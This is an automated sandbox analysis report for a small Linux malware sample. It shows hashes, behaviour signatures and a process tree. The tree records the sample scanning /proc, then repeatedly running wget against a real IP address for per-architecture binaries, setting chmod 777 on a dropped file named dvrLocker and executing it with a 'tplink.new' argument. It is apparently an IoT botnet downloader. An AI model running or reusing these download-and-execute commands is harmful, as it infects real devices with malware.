Analysis

  • max time kernel
    13s
  • max time network
    131s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    27/11/2024, 02:39

General

  • Target

    6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

  • Size

    913B

  • MD5

    c18ef2271ad912c7542293151373ffa0

  • SHA1

    65fb65c17671657fc431173051fe794c6c63007d

  • SHA256

    6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b

  • SHA512

    fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9

Malware Config

Signatures

  • File and Directory Permissions Modification (1 TTPs, 21 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE (21 IoCs)
  • Reads runtime system information (64 IoCs)

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery (1 TTPs, 6 IoCs)

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory (1 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
    /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
    1⤵
    • Writes file to tmp directory
    PID:1480
    • /bin/ls
      ls -l /proc/1/exe
      2⤵
      • Reads runtime system information
      PID:1481
    • /bin/ls
      ls -l /proc/10/exe
      2⤵
      PID:1483
    • /bin/ls
      ls -l /proc/1012/exe
      2⤵
      PID:1484
    • /bin/ls
      ls -l /proc/1017/exe
      2⤵
      PID:1485
    • /bin/ls
      ls -l /proc/1041/exe
      2⤵
      PID:1486
    • /bin/ls
      ls -l /proc/1047/exe
      2⤵
      PID:1487
    • /bin/ls
      ls -l /proc/1061/exe
      2⤵
      PID:1488
    • /bin/ls
      ls -l /proc/1065/exe
      2⤵
      • Reads runtime system information
      PID:1489
    • /bin/ls
      ls -l /proc/1067/exe
      2⤵
      PID:1490
    • /bin/ls
      ls -l /proc/1070/exe
      2⤵
      PID:1491
    • /bin/ls
      ls -l /proc/1077/exe
      2⤵
      • Reads runtime system information
      PID:1492
    • /bin/ls
      ls -l /proc/108/exe
      2⤵
      PID:1494
    • /bin/ls
      ls -l /proc/1084/exe
      2⤵
      PID:1497
    • /bin/ls
      ls -l /proc/1088/exe
      2⤵
      PID:1498
    • /bin/ls
      ls -l /proc/1097/exe
      2⤵
      PID:1499
    • /bin/ls
      ls -l /proc/11/exe
      2⤵
      PID:1500
    • /bin/ls
      ls -l /proc/1112/exe
      2⤵
      • Reads runtime system information
      PID:1501
    • /bin/ls
      ls -l /proc/1113/exe
      2⤵
      PID:1502
    • /bin/ls
      ls -l /proc/1121/exe
      2⤵
      PID:1503
    • /bin/ls
      ls -l /proc/1125/exe
      2⤵
      • Reads runtime system information
      PID:1504
    • /bin/ls
      ls -l /proc/1129/exe
      2⤵
      • Reads runtime system information
      PID:1505
    • /bin/ls
      ls -l /proc/1134/exe
      2⤵
      • Reads runtime system information
      PID:1506
    • /bin/ls
      ls -l /proc/1138/exe
      2⤵
      PID:1507
    • /bin/ls
      ls -l /proc/1143/exe
      2⤵
      PID:1508
    • /bin/ls
      ls -l /proc/1146/exe
      2⤵
      PID:1509
    • /bin/ls
      ls -l /proc/1148/exe
      2⤵
      PID:1510
    • /bin/ls
      ls -l /proc/1151/exe
      2⤵
      • Reads runtime system information
      PID:1511
    • /bin/ls
      ls -l /proc/1152/exe
      2⤵
      • Reads runtime system information
      PID:1512
    • /bin/ls
      ls -l /proc/1154/exe
      2⤵
      PID:1513
    • /bin/ls
      ls -l /proc/116/exe
      2⤵
      • Reads runtime system information
      PID:1514
    • /bin/ls
      ls -l /proc/1162/exe
      2⤵
      • Reads runtime system information
      PID:1515
    • /bin/ls
      ls -l /proc/1165/exe
      2⤵
      PID:1516
    • /bin/ls
      ls -l /proc/1166/exe
      2⤵
      PID:1517
    • /bin/ls
      ls -l /proc/1168/exe
      2⤵
      PID:1518
    • /bin/ls
      ls -l /proc/1173/exe
      2⤵
      PID:1519
    • /bin/ls
      ls -l /proc/1178/exe
      2⤵
      PID:1520
    • /bin/ls
      ls -l /proc/1182/exe
      2⤵
      PID:1521
    • /bin/ls
      ls -l /proc/1184/exe
      2⤵
      • Reads runtime system information
      PID:1522
    • /bin/ls
      ls -l /proc/1186/exe
      2⤵
      PID:1523
    • /bin/ls
      ls -l /proc/1188/exe
      2⤵
      • Reads runtime system information
      PID:1524
    • /bin/ls
      ls -l /proc/1191/exe
      2⤵
      PID:1525
    • /bin/ls
      ls -l /proc/1194/exe
      2⤵
      • Reads runtime system information
      PID:1526
    • /bin/ls
      ls -l /proc/12/exe
      2⤵
      • Reads runtime system information
      PID:1527
    • /bin/ls
      ls -l /proc/1229/exe
      2⤵
      PID:1528
    • /bin/ls
      ls -l /proc/1239/exe
      2⤵
      PID:1529
    • /bin/ls
      ls -l /proc/1250/exe
      2⤵
      PID:1530
    • /bin/ls
      ls -l /proc/1252/exe
      2⤵
      PID:1531
    • /bin/ls
      ls -l /proc/1266/exe
      2⤵
      • Reads runtime system information
      PID:1532
    • /bin/ls
      ls -l /proc/1285/exe
      2⤵
      PID:1533
    • /bin/ls
      ls -l /proc/1286/exe
      2⤵
      • Reads runtime system information
      PID:1534
    • /bin/ls
      ls -l /proc/1293/exe
      2⤵
      • Reads runtime system information
      PID:1535
    • /bin/ls
      ls -l /proc/13/exe
      2⤵
      PID:1536
    • /bin/ls
      ls -l /proc/130/exe
      2⤵
      • Reads runtime system information
      PID:1538
    • /bin/ls
      ls -l /proc/1303/exe
      2⤵
      • Reads runtime system information
      PID:1540
    • /bin/ls
      ls -l /proc/1308/exe
      2⤵
      • Reads runtime system information
      PID:1542
    • /bin/ls
      ls -l /proc/1319/exe
      2⤵
      PID:1543
    • /bin/ls
      ls -l /proc/1331/exe
      2⤵
      PID:1544
    • /bin/ls
      ls -l /proc/1341/exe
      2⤵
      PID:1545
    • /bin/ls
      ls -l /proc/1348/exe
      2⤵
      PID:1546
    • /bin/ls
      ls -l /proc/1370/exe
      2⤵
      • Reads runtime system information
      PID:1547
    • /bin/ls
      ls -l /proc/14/exe
      2⤵
      • Reads runtime system information
      PID:1548
    • /bin/ls
      ls -l /proc/1469/exe
      2⤵
      PID:1549
    • /bin/ls
      ls -l /proc/1475/exe
      2⤵
      PID:1550
    • /bin/ls
      ls -l /proc/1476/exe
      2⤵
      PID:1551
    • /bin/ls
      ls -l /proc/1477/exe
      2⤵
      • Reads runtime system information
      PID:1552
    • /bin/ls
      ls -l /proc/1478/exe
      2⤵
      PID:1553
    • /bin/ls
      ls -l /proc/1480/exe
      2⤵
      PID:1554
    • /bin/ls
      ls -l /proc/15/exe
      2⤵
      PID:1555
    • /bin/ls
      ls -l /proc/16/exe
      2⤵
      PID:1556
    • /bin/ls
      ls -l /proc/163/exe
      2⤵
      • Reads runtime system information
      PID:1557
    • /bin/ls
      ls -l /proc/164/exe
      2⤵
      PID:1558
    • /bin/ls
      ls -l /proc/165/exe
      2⤵
      PID:1559
    • /bin/ls
      ls -l /proc/166/exe
      2⤵
      PID:1560
    • /bin/ls
      ls -l /proc/167/exe
      2⤵
      PID:1561
    • /bin/ls
      ls -l /proc/168/exe
      2⤵
      PID:1562
    • /bin/ls
      ls -l /proc/169/exe
      2⤵
      PID:1563
    • /bin/ls
      ls -l /proc/17/exe
      2⤵
      PID:1564
    • /bin/ls
      ls -l /proc/170/exe
      2⤵
      PID:1565
    • /bin/ls
      ls -l /proc/171/exe
      2⤵
      PID:1566
    • /bin/ls
      ls -l /proc/172/exe
      2⤵
      PID:1567
    • /bin/ls
      ls -l /proc/173/exe
      2⤵
      • Reads runtime system information
      PID:1568
    • /bin/ls
      ls -l /proc/174/exe
      2⤵
      PID:1571
    • /bin/ls
      ls -l /proc/175/exe
      2⤵
      PID:1572
    • /bin/ls
      ls -l /proc/176/exe
      2⤵
      PID:1574
    • /bin/ls
      ls -l /proc/177/exe
      2⤵
      PID:1575
    • /bin/ls
      ls -l /proc/178/exe
      2⤵
      • Reads runtime system information
      PID:1578
    • /bin/ls
      ls -l /proc/179/exe
      2⤵
      • Reads runtime system information
      PID:1580
    • /bin/ls
      ls -l /proc/18/exe
      2⤵
      PID:1581
    • /bin/ls
      ls -l /proc/181/exe
      2⤵
      • Reads runtime system information
      PID:1582
    • /bin/ls
      ls -l /proc/19/exe
      2⤵
      • Reads runtime system information
      PID:1583
    • /bin/ls
      ls -l /proc/2/exe
      2⤵
      PID:1584
    • /bin/ls
      ls -l /proc/20/exe
      2⤵
      PID:1585
    • /bin/ls
      ls -l /proc/206/exe
      2⤵
      • Reads runtime system information
      PID:1586
    • /bin/ls
      ls -l /proc/207/exe
                                                                                                                                  2⤵
                                                                                                                                    PID:1587
                                                                                                                                  • /bin/ls
                                                                                                                                    ls -l /proc/21/exe
                                                                                                                                    2⤵
                                                                                                                                    • Reads runtime system information
                                                                                                                                    PID:1588
                                                                                                                                  • /bin/ls
                                                                                                                                    ls -l /proc/22/exe
                                                                                                                                    2⤵
                                                                                                                                    • Reads runtime system information
                                                                                                                                    PID:1589
                                                                                                                                  • /bin/ls
                                                                                                                                    ls -l /proc/23/exe
                                                                                                                                    2⤵
                                                                                                                                      PID:1590
                                                                                                                                    • /bin/ls
                                                                                                                                      ls -l /proc/24/exe
                                                                                                                                      2⤵
                                                                                                                                        PID:1591
                                                                                                                                      • /bin/ls
                                                                                                                                        ls -l /proc/25/exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1592
                                                                                                                                        • /bin/ls
                                                                                                                                          ls -l /proc/255/exe
                                                                                                                                          2⤵
                                                                                                                                            PID:1593
                                                                                                                                          • /bin/ls
                                                                                                                                            ls -l /proc/26/exe
                                                                                                                                            2⤵
                                                                                                                                            • Reads runtime system information
                                                                                                                                            PID:1594
                                                                                                                                          • /bin/ls
                                                                                                                                            ls -l /proc/27/exe
                                                                                                                                            2⤵
                                                                                                                                              PID:1595
                                                                                                                                            • /bin/ls
                                                                                                                                              ls -l /proc/276/exe
                                                                                                                                              2⤵
                                                                                                                                                PID:1596
                                                                                                                                              • /bin/ls
                                                                                                                                                ls -l /proc/28/exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:1597
                                                                                                                                                • /bin/ls
                                                                                                                                                  ls -l /proc/29/exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1598
                                                                                                                                                  • /bin/ls
                                                                                                                                                    ls -l /proc/3/exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1599
                                                                                                                                                    • /bin/ls
                                                                                                                                                      ls -l /proc/30/exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1600
                                                                                                                                                      • /bin/ls
                                                                                                                                                        ls -l /proc/31/exe
                                                                                                                                                        2⤵
                                                                                                                                                        • Reads runtime system information
                                                                                                                                                        PID:1601
                                                                                                                                                      • /bin/ls
                                                                                                                                                        ls -l /proc/32/exe
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1602
                                                                                                                                                        • /bin/ls
                                                                                                                                                          ls -l /proc/334/exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:1603
                                                                                                                                                        • /bin/ls
                                                                                                                                                          ls -l /proc/336/exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:1604
                                                                                                                                                        • /bin/ls
                                                                                                                                                          ls -l /proc/34/exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1605
                                                                                                                                                          • /bin/ls
                                                                                                                                                            ls -l /proc/35/exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1606
                                                                                                                                                            • /bin/ls
                                                                                                                                                              ls -l /proc/36/exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1607
                                                                                                                                                              • /bin/ls
                                                                                                                                                                ls -l /proc/4/exe
                                                                                                                                                                2⤵
                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                PID:1608
                                                                                                                                                              • /bin/ls
                                                                                                                                                                ls -l /proc/415/exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1609
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/421/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1610
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/425/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1611
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/433/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1612
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/439/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1613
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/440/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                  PID:1614
                                                                                                                                                                • /bin/ls
                                                                                                                                                                  ls -l /proc/441/exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1615
                                                                                                                                                                  • /bin/ls
                                                                                                                                                                    ls -l /proc/444/exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                    PID:1616
                                                                                                                                                                  • /bin/ls
                                                                                                                                                                    ls -l /proc/451/exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                    PID:1617
                                                                                                                                                                  • /bin/ls
                                                                                                                                                                    ls -l /proc/457/exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1618
                                                                                                                                                                    • /bin/ls
                                                                                                                                                                      ls -l /proc/462/exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                      PID:1619
                                                                                                                                                                    • /bin/ls
                                                                                                                                                                      ls -l /proc/464/exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                      PID:1620
                                                                                                                                                                    • /bin/ls
                                                                                                                                                                      ls -l /proc/465/exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1621
                                                                                                                                                                      • /bin/ls
                                                                                                                                                                        ls -l /proc/466/exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1622
                                                                                                                                                                        • /bin/ls
                                                                                                                                                                          ls -l /proc/468/exe
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                          PID:1623
                                                                                                                                                                        • /bin/ls
                                                                                                                                                                          ls -l /proc/485/exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1624
                                                                                                                                                                          • /bin/ls
      ls -l /proc/5/exe
      2⤵
      PID:1625
    • /bin/ls
      ls -l /proc/515/exe
      2⤵
      • Reads runtime system information
      PID:1626
    • /bin/ls
      ls -l /proc/518/exe
      2⤵
      • Reads runtime system information
      PID:1627
    • /bin/ls
      ls -l /proc/524/exe
      2⤵
      • Reads runtime system information
      PID:1628
    • /bin/ls
      ls -l /proc/532/exe
      2⤵
      PID:1629
    • /bin/ls
      ls -l /proc/544/exe
      2⤵
      PID:1630
    • /bin/ls
      ls -l /proc/568/exe
      2⤵
      • Reads runtime system information
      PID:1631
    • /bin/ls
      ls -l /proc/595/exe
      2⤵
      • Reads runtime system information
      PID:1632
    • /bin/ls
      ls -l /proc/596/exe
      2⤵
      PID:1633
    • /bin/ls
      ls -l /proc/6/exe
      2⤵
      PID:1634
    • /bin/ls
      ls -l /proc/632/exe
      2⤵
      • Reads runtime system information
      PID:1635
    • /bin/ls
      ls -l /proc/650/exe
      2⤵
      PID:1636
    • /bin/ls
      ls -l /proc/652/exe
      2⤵
      PID:1637
    • /bin/ls
      ls -l /proc/662/exe
      2⤵
      PID:1638
    • /bin/ls
      ls -l /proc/665/exe
      2⤵
      PID:1639
    • /bin/ls
      ls -l /proc/670/exe
      2⤵
      • Reads runtime system information
      PID:1640
    • /bin/ls
      ls -l /proc/7/exe
      2⤵
      PID:1641
    • /bin/ls
      ls -l /proc/708/exe
      2⤵
      • Reads runtime system information
      PID:1642
    • /bin/ls
      ls -l /proc/712/exe
      2⤵
      • Reads runtime system information
      PID:1643
    • /bin/ls
      ls -l /proc/716/exe
      2⤵
      • Reads runtime system information
      PID:1644
    • /bin/ls
      ls -l /proc/78/exe
      2⤵
      PID:1645
    • /bin/ls
      ls -l /proc/79/exe
      2⤵
      • Reads runtime system information
      PID:1646
    • /bin/ls
      ls -l /proc/8/exe
      2⤵
      • Reads runtime system information
      PID:1647
    • /bin/ls
      ls -l /proc/80/exe
      2⤵
      • Reads runtime system information
      PID:1648
    • /bin/ls
      ls -l /proc/81/exe
      2⤵
      • Reads runtime system information
      PID:1649
    • /bin/ls
      ls -l /proc/82/exe
      2⤵
      PID:1650
    • /bin/ls
      ls -l /proc/83/exe
      2⤵
      PID:1651
    • /bin/ls
      ls -l /proc/84/exe
      2⤵
      PID:1652
    • /bin/ls
      ls -l /proc/85/exe
      2⤵
      PID:1653
    • /bin/ls
      ls -l /proc/867/exe
      2⤵
      • Reads runtime system information
      PID:1654
    • /bin/ls
      ls -l /proc/89/exe
      2⤵
      PID:1655
    • /bin/ls
      ls -l /proc/9/exe
      2⤵
      • Reads runtime system information
      PID:1656
    • /bin/ls
      ls -l /proc/917/exe
      2⤵
      PID:1657
    • /bin/ls
      ls -l /proc/934/exe
      2⤵
      PID:1658
    • /bin/ls
      ls -l /proc/949/exe
      2⤵
      PID:1659
    • /bin/ls
      ls -l /proc/962/exe
      2⤵
      PID:1660
    • /bin/ls
      ls -l /proc/968/exe
      2⤵
      PID:1661
    • /bin/ls
      ls -l /proc/98/exe
      2⤵
      PID:1662
    • /bin/rm
      rm -rf /tmp/lib/
      2⤵
      PID:1663
    • /bin/rm
      rm -rf /tmp/lib/dvrLocker
      2⤵
      PID:1664
    • /bin/mkdir
      mkdir /tmp/lib/
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1665
    • /usr/bin/wget
      wget http://45.125.66.90/mpsl -O -
      2⤵
      PID:1666
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1667
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1668
    • /bin/rm
      rm -rf mpsl
      2⤵
      PID:1670
    • /usr/bin/wget
      wget http://45.125.66.90/mips -O -
      2⤵
      • System Network Configuration Discovery
      PID:1671
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1673
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1674
    • /bin/rm
      rm -rf mips
      2⤵
      • System Network Configuration Discovery
      PID:1676
    • /usr/bin/wget
      wget http://45.125.66.90/arm -O -
      2⤵
      PID:1677
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1678
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1679
    • /bin/rm
      rm -rf arm
      2⤵
      PID:1681
    • /usr/bin/wget
      wget http://45.125.66.90/arm5 -O -
      2⤵
      PID:1682
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1683
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1684
    • /bin/rm
      rm -rf arm5
      2⤵
      PID:1686
    • /usr/bin/wget
      wget http://45.125.66.90/ppc -O -
      2⤵
      PID:1687
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1688
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1689
    • /bin/rm
      rm -rf ppc
      2⤵
      PID:1691
    • /usr/bin/wget
      wget http://45.125.66.90/arm7 -O -
      2⤵
      PID:1692
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1693
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1694
    • /bin/rm
      rm -rf arm7
      2⤵
      PID:1696
    • /usr/bin/wget
      wget http://45.125.66.90/arm6 -O -
      2⤵
      PID:1697
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1698
    • /tmp/lib/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1699
    • /bin/rm
      rm -rf arm6
      2⤵
      PID:1701
                                                                                                                                                                                                                                                    • /bin/rm
                                                                                                                                                                                                                                                      rm -rf /mnt/dvrLocker
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:1702
                                                                                                                                                                                                                                                      • /usr/bin/wget
                                                                                                                                                                                                                                                        wget http://45.125.66.90/mpsl -O -
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:1703
                                                                                                                                                                                                                                                        • /bin/chmod
                                                                                                                                                                                                                                                          chmod 777 dvrLocker
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • File and Directory Permissions Modification
                                                                                                                                                                                                                                                          PID:1704
                                                                                                                                                                                                                                                        • /mnt/dvrLocker
                                                                                                                                                                                                                                                          ./dvrLocker tplink.new
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:1705
                                                                                                                                                                                                                                                        • /bin/rm
                                                                                                                                                                                                                                                          rm -rf mpsl
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:1707
                                                                                                                                                                                                                                                          • /usr/bin/wget
                                                                                                                                                                                                                                                            wget http://45.125.66.90/mips -O -
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • System Network Configuration Discovery
                                                                                                                                                                                                                                                            PID:1708
                                                                                                                                                                                                                                                          • /bin/chmod
                                                                                                                                                                                                                                                            chmod 777 dvrLocker
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                                            PID:1709
                                                                                                                                                                                                                                                          • /mnt/dvrLocker
                                                                                                                                                                                                                                                            ./dvrLocker tplink.new
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:1710
                                                                                                                                                                                                                                                          • /bin/rm
                                                                                                                                                                                                                                                            rm -rf mips
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • System Network Configuration Discovery
                                                                                                                                                                                                                                                            PID:1712
                                                                                                                                                                                                                                                          • /usr/bin/wget
                                                                                                                                                                                                                                                            wget http://45.125.66.90/arm -O -
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1713
                                                                                                                                                                                                                                                            • /bin/chmod
                                                                                                                                                                                                                                                              chmod 777 dvrLocker
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                                                                                                                              PID:1714
                                                                                                                                                                                                                                                            • /mnt/dvrLocker
                                                                                                                                                                                                                                                              ./dvrLocker tplink.new
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:1715
                                                                                                                                                                                                                                                            • /bin/rm
                                                                                                                                                                                                                                                              rm -rf arm
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1717
                                                                                                                                                                                                                                                              • /usr/bin/wget
                                                                                                                                                                                                                                                                wget http://45.125.66.90/arm5 -O -
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1718
                                                                                                                                                                                                                                                                • /bin/chmod
                                                                                                                                                                                                                                                                  chmod 777 dvrLocker
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                  PID:1719
                                                                                                                                                                                                                                                                • /mnt/dvrLocker
                                                                                                                                                                                                                                                                  ./dvrLocker tplink.new
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:1720
                                                                                                                                                                                                                                                                • /bin/rm
                                                                                                                                                                                                                                                                  rm -rf arm5
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:1722
                                                                                                                                                                                                                                                                  • /usr/bin/wget
                                                                                                                                                                                                                                                                    wget http://45.125.66.90/ppc -O -
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:1723
                                                                                                                                                                                                                                                                    • /bin/chmod
                                                                                                                                                                                                                                                                      chmod 777 dvrLocker
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                      PID:1724
                                                                                                                                                                                                                                                                    • /mnt/dvrLocker
                                                                                                                                                                                                                                                                      ./dvrLocker tplink.new
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:1725
                                                                                                                                                                                                                                                                    • /bin/rm
                                                                                                                                                                                                                                                                      rm -rf ppc
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1727
                                                                                                                                                                                                                                                                      • /usr/bin/wget
                                                                                                                                                                                                                                                                        wget http://45.125.66.90/arm7 -O -
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:1728
                                                                                                                                                                                                                                                                        • /bin/chmod
                                                                                                                                                                                                                                                                          chmod 777 dvrLocker
                                                                                                                                                                                                                                                                          2⤵
      • File and Directory Permissions Modification
      PID:1729
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1730
    • /bin/rm
      rm -rf arm7
      2⤵
      PID:1732
    • /usr/bin/wget
      wget http://45.125.66.90/arm6 -O -
      2⤵
      PID:1733
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1734
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1735
    • /bin/rm
      rm -rf arm6
      2⤵
      PID:1737
    • /usr/bin/wget
      wget http://45.125.66.90/mpsl -O -
      2⤵
      PID:1738
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1739
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1740
    • /bin/rm
      rm -rf mpsl
      2⤵
      PID:1742
    • /usr/bin/wget
      wget http://45.125.66.90/mips -O -
      2⤵
      • System Network Configuration Discovery
      PID:1743
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1744
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1745
    • /bin/rm
      rm -rf mips
      2⤵
      • System Network Configuration Discovery
      PID:1747
    • /usr/bin/wget
      wget http://45.125.66.90/arm -O -
      2⤵
      PID:1748
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1749
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1750
    • /bin/rm
      rm -rf arm
      2⤵
      PID:1752
    • /usr/bin/wget
      wget http://45.125.66.90/arm5 -O -
      2⤵
      PID:1753
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1754
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1755
    • /bin/rm
      rm -rf arm5
      2⤵
      PID:1757
    • /usr/bin/wget
      wget http://45.125.66.90/ppc -O -
      2⤵
      PID:1758
    • /bin/chmod
      chmod 777 dvrLocker
      2⤵
      • File and Directory Permissions Modification
      PID:1759
    • /mnt/dvrLocker
      ./dvrLocker tplink.new
      2⤵
      • Executes dropped EXE
      PID:1760
    • /bin/rm
      rm -rf ppc
      2⤵
      PID:1762
    • /usr/bin/wget
      wget http://45.125.66.90/arm7 -O -
      2⤵
      PID:1763
                                                                                                                                                                                                                                                                                                • /bin/chmod
                                                                                                                                                                                                                                                                                                  chmod 777 dvrLocker
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                  PID:1764
                                                                                                                                                                                                                                                                                                • /mnt/dvrLocker
                                                                                                                                                                                                                                                                                                  ./dvrLocker tplink.new
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:1765
                                                                                                                                                                                                                                                                                                • /bin/rm
                                                                                                                                                                                                                                                                                                  rm -rf arm7
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1767
                                                                                                                                                                                                                                                                                                  • /usr/bin/wget
